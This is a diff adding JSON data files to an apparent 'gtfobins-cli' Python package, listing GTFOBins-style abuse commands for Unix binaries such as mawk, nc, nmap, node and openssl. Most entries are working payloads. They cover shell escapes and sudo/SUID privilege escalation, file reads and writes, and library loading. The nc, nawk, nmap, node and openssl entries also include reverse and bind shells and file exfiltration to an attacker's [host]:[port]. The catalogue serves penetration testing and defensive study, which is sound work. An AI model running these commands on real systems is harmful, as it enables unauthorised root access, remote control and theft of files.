gtfobins-cli 1.0.0__py3-none-any.whl

gtfo/data/mawk.json

@@ -0,0 +1,34 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "mawk 'BEGIN {system(\"/bin/sh\")}'"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "mawk 'BEGIN { print \"DATA\" > \"[file]\" }'\n"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "mawk '//' \"[file]\"\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./mawk '//' \"[file]\""
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo mawk 'BEGIN {system(\"/bin/sh\")}'"
+      }
+    ],
+    "limited-suid": [
+      {
+        "code": "./mawk 'BEGIN {system(\"/bin/sh\")}'"
+      }
+    ]
+  }
+}

gtfo/data/more.json

@@ -0,0 +1,24 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "TERM= more /etc/profile\n!/bin/sh\n"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "more [file]"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./more [file]"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "TERM= sudo more /etc/profile\n!/bin/sh\n"
+      }
+    ]
+  }
+}

gtfo/data/mount.json

@@ -0,0 +1,10 @@
+{
+  "functions": {
+    "sudo": [
+      {
+        "description": "Exploit the fact that 'mount' can be executed via 'sudo' to replace the 'mount' binary with a shell.",
+        "code": "sudo mount -o bind /bin/sh /bin/mount\nsudo mount\n"
+      }
+    ]
+  }
+}

gtfo/data/mtr.json

@@ -0,0 +1,15 @@
+{
+  "description": "The read file content is corrupted by error prints.",
+  "functions": {
+    "file-read": [
+      {
+        "code": "mtr --raw -F \"[file]\"\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo mtr --raw -F \"[file]\"\n"
+      }
+    ]
+  }
+}

gtfo/data/mv.json

@@ -0,0 +1,15 @@
+{
+  "description": "This can be used to move and then read or write files from a restricted file systems or with elevated privileges.",
+  "functions": {
+    "suid": [
+      {
+        "code": "TF=$(mktemp)\necho \"DATA\" > $TF\n./mv $TF [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "TF=$(mktemp)\necho \"DATA\" > $TF\nsudo mv $TF [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/mysql.json

@@ -0,0 +1,26 @@
+{
+  "description": "A valid MySQL server must be available.",
+  "functions": {
+    "shell": [
+      {
+        "code": "mysql -e '\\! /bin/sh'"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo mysql -e '\\! /bin/sh'"
+      }
+    ],
+    "limited-suid": [
+      {
+        "code": "./mysql -e '\\! /bin/sh'"
+      }
+    ],
+    "library-load": [
+      {
+        "description": "A MySQL server must accept connections in order for this to work. The following loads the '/path/to/lib.so' shared object.",
+        "code": "mysql --default-auth ../../../../../path/to/lib"
+      }
+    ]
+  }
+}

gtfo/data/nano.json

@@ -0,0 +1,34 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "nano\n^R^X\nreset; sh 1>&0 2>&0\n"
+      },
+      {
+        "description": "The 'SPELL' environment variable can be used in place of the '-s' option if the command line cannot be changed.",
+        "code": "nano -s /bin/sh\n/bin/sh\n^T\n"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "nano [file]\n[data]\n^O\n"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "nano [file]"
+      }
+    ],
+    "limited-suid": [
+      {
+        "description": "The 'SPELL' environment variable can be used in place of the '-s' option if the command line cannot be changed.",
+        "code": "./nano -s /bin/sh\n/bin/sh\n^T\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo nano\n^R^X\nreset; sh 1>&0 2>&0\n"
+      }
+    ]
+  }
+}

gtfo/data/nawk.json

@@ -0,0 +1,46 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "nawk 'BEGIN {system(\"/bin/sh\")}'"
+      }
+    ],
+    "non-interactive-reverse-shell": [
+      {
+        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell.",
+        "code": "nawk 'BEGIN {\n    s = \"/inet/tcp/0/[host]/[port]\";\n    while (1) {printf \"> \" |& s; if ((s |& getline c) <= 0) break;\n    while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'\n"
+      }
+    ],
+    "non-interactive-bind-shell": [
+      {
+        "description": "Run 'nc [host] [port]' on the attacker box to connect to the shell.",
+        "code": "nawk 'BEGIN {\n    s = \"/inet/tcp/[port]/0/0\";\n    while (1) {printf \"> \" |& s; if ((s |& getline c) <= 0) break;\n    while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'\n"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "nawk 'BEGIN { print \"DATA\" > \"[file]\" }'\n"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "nawk '//' \"[file]\"\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./nawk '//' \"[file]\""
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo nawk 'BEGIN {system(\"/bin/sh\")}'"
+      }
+    ],
+    "limited-suid": [
+      {
+        "code": "./nawk 'BEGIN {system(\"/bin/sh\")}'"
+      }
+    ]
+  }
+}

gtfo/data/nc.json

@@ -0,0 +1,40 @@
+{
+  "functions": {
+    "reverse-shell": [
+      {
+        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell. This only works with netcat traditional.",
+        "code": "nc -e /bin/sh [host] [port]\n"
+      }
+    ],
+    "bind-shell": [
+      {
+        "description": "Run 'nc [host] [port]` on the attacker box to connect to the shell. This only works with netcat traditional.",
+        "code": "nc -l -p [port] -e /bin/sh\n"
+      }
+    ],
+    "file-upload": [
+      {
+        "description": "Send a local file via TCP. Run 'nc -l -p [port] > [file]' on the attacker box to collect the file.",
+        "code": "nc [host] [port] < [file]\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "Fetch a remote file via TCP. Run 'nc [host] [port] < [port]' on the attacker box to send the file.",
+        "code": "nc -l -p [port] > [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell. This only works with netcat traditional.",
+        "code": "sudo nc -e /bin/sh [host] [port]\n"
+      }
+    ],
+    "limited-suid": [
+      {
+        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell. This only works with netcat traditional.",
+        "code": "./nc -e /bin/sh [host] [port]\n"
+      }
+    ]
+  }
+}

gtfo/data/nice.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "nice /bin/sh"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./nice /bin/sh -p"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo nice /bin/sh"
+      }
+    ]
+  }
+}

gtfo/data/nl.json

@@ -0,0 +1,20 @@
+{
+  "description": "The read file content is corrupted by a leading space added to each line.",
+  "functions": {
+    "file-read": [
+      {
+        "code": "nl -bn -w1 -s '' [file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./nl -bn -w1 -s '' [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo nl -bn -w1 -s '' [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/nmap.json

@@ -0,0 +1,82 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "description": "Input echo is disabled.",
+        "code": "TF=$(mktemp)\necho 'os.execute(\"/bin/sh\")' > $TF\nnmap --script=$TF\n"
+      },
+      {
+        "description": "The interactive mode, available on versions 2.02 to 5.21, can be used to execute shell commands.",
+        "code": "nmap --interactive\nnmap> !sh\n"
+      }
+    ],
+    "non-interactive-reverse-shell": [
+      {
+        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell.",
+        "code": "TF=$(mktemp)\necho 'local s=require(\"socket\");\nlocal t=assert(s.tcp());\nt:connect(\"[host]\",[port]);\nwhile true do\n  local r,x=t:receive();local f=assert(io.popen(r,\"r\"));\n  local b=assert(f:read(\"*a\"));t:send(b);\nend;\nf:close();t:close();' > $TF\nnmap --script=$TF\n"
+      }
+    ],
+    "non-interactive-bind-shell": [
+      {
+        "description": "Run 'nc [host] [port]' on the attacker box to connect to the shell.",
+        "code": "TF=$(mktemp)\necho 'local k=require(\"socket\");\nlocal s=assert(k.bind(\"*\",[port]));\nlocal c=s:accept();\nwhile true do\n  local r,x=c:receive();local f=assert(io.popen(r,\"r\"));\n  local b=assert(f:read(\"*a\"));c:send(b);\nend;c:close();f:close();' > $TF\nnmap --script=$TF\n"
+      }
+    ],
+    "file-upload": [
+      {
+        "description": "Send a local file via TCP. Run 'socat -v tcp-listen:8080,reuseaddr,fork -' on the attacker box to collect the file or use a proper HTTP server. Note that multiple connections are made to the server. Also, it is important that the port is a commonly used HTTP like 80 or 8080.",
+        "code": "nmap -p [port] [host] --script http-put --script-args http-put.url=/,http-put.file=[file]\n"
+      },
+      {
+        "description": "Send a local file via TCP. Run 'nc -l -p [port] > [file]' on the attacker box to collect the file.",
+        "code": "TF=$(mktemp)\necho 'local f=io.open(\"[file]\", 'rb')\nlocal d=f:read(\"*a\")\nio.close(f);\nlocal s=require(\"socket\");\nlocal t=assert(s.tcp());\nt:connect(\"[host]\",[port]);\nt:send(d);\nt:close();' > $TF\nnmap --script=$TF\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "Fetch a remote file via TCP. Run a proper HTTP server on the attacker box to send the file, e.g., 'php -S 0.0.0.0:8080'. Note that multiple connections are made to the server and the result is placed in '$TF/IP/PORT/PATH'. Also, it is important that the port is a commonly used HTTP like 80 or 8080.",
+        "code": "TF=$(mktemp -d)\nnmap -p [port] [host] --script http-fetch --script-args http-fetch.destination=$TF,http-fetch.url=[file]\n"
+      },
+      {
+        "description": "Fetch a remote file via TCP. Run 'nc [host] [port] < [file]' on the attacker box to send the file.",
+        "code": "TF=$(mktemp)\necho 'local k=require(\"socket\");\nlocal s=assert(k.bind(\"*\",[port]));\nlocal c=s:accept();\nlocal d,x=c:receive(\"*a\");\nc:close();\nlocal f=io.open(\"[file]\", \"wb\");\nf:write(d);\nio.close(f);' > $TF\nnmap --script=$TF\n"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "TF=$(mktemp)\necho 'local f=io.open(\"[file]\", \"wb\"); f:write(\"[data]\"); io.close(f);' > $TF\nnmap --script=$TF\n"
+      },
+      {
+        "description": "The payload appears inside the regular nmap output.",
+        "code": "nmap -oG=[file] [data]\n"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "TF=$(mktemp)\necho 'local f=io.open(\"[file]\", \"rb\"); print(f:read(\"*a\")); io.close(f);' > $TF\nnmap --script=$TF\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "Input echo is disabled.",
+        "code": "TF=$(mktemp)\necho 'os.execute(\"/bin/sh\")' > $TF\nsudo nmap --script=$TF\n"
+      },
+      {
+        "description": "The interactive mode, available on versions 2.02 to 5.21, can be used to execute shell commands.",
+        "code": "sudo nmap --interactive\nnmap> !sh\n"
+      }
+    ],
+    "limited-suid": [
+      {
+        "description": "Input echo is disabled.",
+        "code": "TF=$(mktemp)\necho 'os.execute(\"/bin/sh\")' > $TF\n./nmap --script=$TF\n"
+      }
+    ],
+    "suid": [
+      {
+        "description": "The payload appears inside the regular nmap output.",
+        "code": "./nmap -oG=[file] [data]\n"
+      }
+    ]
+  }
+}

gtfo/data/node.json

@@ -0,0 +1,58 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "node -e 'child_process.spawn(\"/bin/sh\", {stdio: [0, 1, 2]})'\n"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "node -e 'fs.writeFileSync(\"file_to_write\", \"DATA\")'"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "node -e 'process.stdout.write(fs.readFileSync(\"/bin/ls\"))'"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "Fetch a remote file via HTTP GET request.",
+        "code": "node -e 'http.get([host], res => res.pipe(fs.createWriteStream([file])))'\n"
+      }
+    ],
+    "file-upload": [
+      {
+        "description": "Send a local file via HTTP POST request.",
+        "code": "node -e 'fs.createReadStream([file]).pipe(http.request([host]))'\n"
+      }
+    ],
+    "reverse-shell": [
+      {
+        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell.",
+        "code": "node -e 'sh = child_process.spawn(\"/bin/sh\");\nnet.connect([port], [host], function () {\n  this.pipe(sh.stdin);\n  sh.stdout.pipe(this);\n  sh.stderr.pipe(this);\n})'\n"
+      }
+    ],
+    "bind-shell": [
+      {
+        "description": "Run 'nc [host] [port]' on the attacker box to connect to the shell.",
+        "code": "node -e 'sh = child_process.spawn(\"/bin/sh\");\nnet.createServer(function (client) {\n  client.pipe(sh.stdin);\n  sh.stdout.pipe(client);\n  sh.stderr.pipe(client);\n}).listen([port])'\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./node -e 'child_process.spawn(\"/bin/sh\", [\"-p\"], {stdio: [0, 1, 2]})'\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo node -e 'child_process.spawn(\"/bin/sh\", {stdio: [0, 1, 2]})'\n"
+      }
+    ],
+    "capabilities": [
+      {
+        "code": "./node -e 'process.setuid(0); child_process.spawn(\"/bin/sh\", {stdio: [0, 1, 2]})'\n"
+      }
+    ]
+  }
+}

gtfo/data/nohup.json

@@ -0,0 +1,24 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "nohup /bin/sh -c \"sh <$(tty) >$(tty) 2>$(tty)\""
+      }
+    ],
+    "command": [
+      {
+        "code": "nohup \"[command]\"\ncat nohup.out\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo nohup /bin/sh -c \"sh <$(tty) >$(tty) 2>$(tty)\""
+      }
+    ],
+    "suid": [
+      {
+        "code": "./nohup /bin/sh -p -c \"sh -p <$(tty) >$(tty) 2>$(tty)\""
+      }
+    ]
+  }
+}

gtfo/data/npm.json

@@ -0,0 +1,14 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "TF=$(mktemp -d)\necho '{\"scripts\": {\"preinstall\": \"/bin/sh\"}}' > $TF/package.json\nnpm -C $TF i\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "TF=$(mktemp -d)\necho '{\"scripts\": {\"preinstall\": \"/bin/sh\"}}' > $TF/package.json\nsudo npm -C $TF --unsafe-perm i\n"
+      }
+    ]
+  }
+}

gtfo/data/nroff.json

@@ -0,0 +1,20 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "description": "The file is typeset and some warning messages may appear.",
+        "code": "nroff [file]\n"
+      }
+    ],
+    "shell": [
+      {
+        "code": "TF=$(mktemp -d)\necho '#!/bin/sh' > $TF/groff\necho '/bin/sh' >> $TF/groff\nchmod +x $TF/groff\nGROFF_BIN_PATH=$TF nroff\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "TF=$(mktemp -d)\necho '#!/bin/sh' > $TF/groff\necho '/bin/sh' >> $TF/groff\nchmod +x $TF/groff\nsudo GROFF_BIN_PATH=$TF nroff\n"
+      }
+    ]
+  }
+}

gtfo/data/nsenter.json

@@ -0,0 +1,14 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "nsenter /bin/sh"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo nsenter /bin/sh"
+      }
+    ]
+  }
+}

gtfo/data/octave-cli.json

@@ -0,0 +1,30 @@
+{
+  "description": "The payloads are compatible with GUI.",
+  "functions": {
+    "shell": [
+      {
+        "code": "octave-cli --eval 'system(\"/bin/sh\")'"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "octave-cli --eval 'filename = \"[file]\"; fid = fopen(filename, \"w\"); fputs(fid, \"[data]\"); fclose(fid);'"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "octave-cli --eval 'format none; fid = fopen(\"[file]\"); while(!feof(fid)); txt = fgetl(fid); disp(txt); endwhile; fclose(fid);'"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo octave-cli --eval 'system(\"/bin/sh\")'"
+      }
+    ],
+    "limited-suid": [
+      {
+        "code": "./octave-cli --eval 'system(\"/bin/sh\")'"
+      }
+    ]
+  }
+}

gtfo/data/od.json

@@ -0,0 +1,20 @@
+{
+  "description": "Three spaces are added before each character in the read file, and non-printable chars are printed as backslash escape sequences.",
+  "functions": {
+    "file-read": [
+      {
+        "code": "od -An -c -w9999 [file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./od -An -c -w9999 [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo od -An -c -w9999 [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/openssl.json

@@ -0,0 +1,55 @@
+{
+  "functions": {
+    "reverse-shell": [
+      {
+        "description": "To receive the shell run the following on the attacker box:\n\nopenssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes\nopenssl s_server -quiet -key key.pem -cert cert.pem -port [port]\n\nCommunication between attacker and target will be encrypted.",
+        "code": "mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect [host]:[port] > /tmp/s; rm /tmp/s\n"
+      }
+    ],
+    "file-upload": [
+      {
+        "description": "To collect the file run the following on the attacker box:\n\nopenssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes\nopenssl s_server -quiet -key key.pem -cert cert.pem -port [port] > [file]\n\nSend a local file via TCP. Transmission will be encrypted.",
+        "code": "openssl s_client -quiet -connect [host]:[port] < [file]\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "To send the file run the following on the attacker box:\n\nopenssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes\nopenssl s_server -quiet -key key.pem -cert cert.pem -port [port] < [file]\n\nFetch a file from a TCP port, transmission will be encrypted.",
+        "code": "openssl s_client -quiet -connect [host]:[port] > [file]\n"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "echo DATA | openssl enc -out [file]\n"
+      },
+      {
+        "code": "TF=$(mktemp)\necho \"DATA\" > $TF\nopenssl enc -in $TF -out [file]\n"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "openssl enc -in [file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "description": "To receive the shell run the following on the attacker box:\n\nopenssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes\nopenssl s_server -quiet -key key.pem -cert cert.pem -port [port]\n\nCommunication between attacker and target will be encrypted.",
+        "code": "mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | ./openssl s_client -quiet -connect [host]:[port] > /tmp/s; rm /tmp/s\n"
+      },
+      {
+        "code": "echo DATA | openssl enc -out [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "To receive the shell run the following on the attacker box:\n\nopenssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes\nopenssl s_server -quiet -key key.pem -cert cert.pem -port [port]\n\nCommunication between attacker and target will be encrypted.",
+        "code": "mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | sudo openssl s_client -quiet -connect [host]:[port] > /tmp/s; rm /tmp/s\n"
+      }
+    ],
+    "library-load": [
+      {
+        "code": "openssl req -engine ./lib.so"
+      }
+    ]
+  }
+}

gtfo/data/openvpn.json

@@ -0,0 +1,28 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "description": "The file is actually parsed and the first partial wrong line is returned in an error message.",
+        "code": "openvpn --config \"[file]\"\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./openvpn --dev tun0 --script-security 2 --up '/bin/sh -p -c \"sh -p\"'\n"
+      },
+      {
+        "description": "The file is actually parsed and the first partial wrong line is returned in an error message.",
+        "code": "./openvpn --config \"[file]\"\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo openvpn --dev tun0 --script-security 2 --up '/bin/sh -c sh'\n"
+      },
+      {
+        "description": "The file is actually parsed and the first partial wrong line is returned in an error message.",
+        "code": "sudo openvpn --config \"[file]\"\n"
+      }
+    ]
+  }
+}

gtfo/data/openvt.json

@@ -0,0 +1,10 @@
+{
+  "functions": {
+    "sudo": [
+      {
+        "description": "The command execution is blind (displayed on the virtual console), but it is possible to save the output on a temporary file.",
+        "code": "TF=$(mktemp -u)\nsudo openvt -- sh -c \"[command] >$TF 2>&1\"\ncat $TF\n"
+      }
+    ]
+  }
+}